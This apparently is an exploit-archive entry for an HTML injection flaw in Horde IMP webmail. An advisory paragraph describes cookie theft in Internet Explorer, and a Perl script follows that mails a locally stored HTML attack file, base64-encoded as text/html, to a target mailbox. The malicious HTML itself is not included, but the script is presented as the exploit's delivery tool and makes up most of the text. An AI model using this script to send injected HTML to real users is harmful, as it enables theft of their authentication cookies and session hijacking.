42 lines
No EOL
1.8 KiB
Perl
Executable file
42 lines
No EOL
1.8 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/15730/info
|
|
|
|
Horde IMP is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.
|
|
|
|
Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.
|
|
|
|
Reports indicate this issue is only present when viewing IMP content with the Microsoft Internet Explorer Web browser.
|
|
|
|
#
|
|
# MIME::Liet SMTP client by C3PO
|
|
#
|
|
use strict;
|
|
use MIME::Base64;
|
|
use MIME::Lite;
|
|
#----------------------------------------------------
|
|
# load_file
|
|
#----------------------------------------------------
|
|
sub load_file{
|
|
my($file) = shift;
|
|
my($Body);
|
|
open(IN, $file) || die("Can't open $file $!");
|
|
binmode IN;
|
|
read(IN, $Body, -s $file);
|
|
close(IN);
|
|
return $Body;
|
|
}
|
|
#----------------------------------------------------
|
|
# main
|
|
#----------------------------------------------------
|
|
my $c = load_file('\Xploits\horder\passed.htm'); #content
|
|
my $m = MIME::Lite->new(
|
|
From =>'mail@domain.zone',
|
|
To =>'mail@domain.zone',
|
|
Subject =>'Horde',
|
|
Date =>"Tue, 17 Dec 2002 22:00:02 +0300",
|
|
Type =>"text/html",
|
|
Data => $c,
|
|
Filename=>"horde.html",
|
|
Encoding =>'base64'
|
|
);
|
|
$m->attr('content-type.charset' => 'windows-1251'); #not necessary
|
|
$m->send("smtp","smtp.domain.zone"); |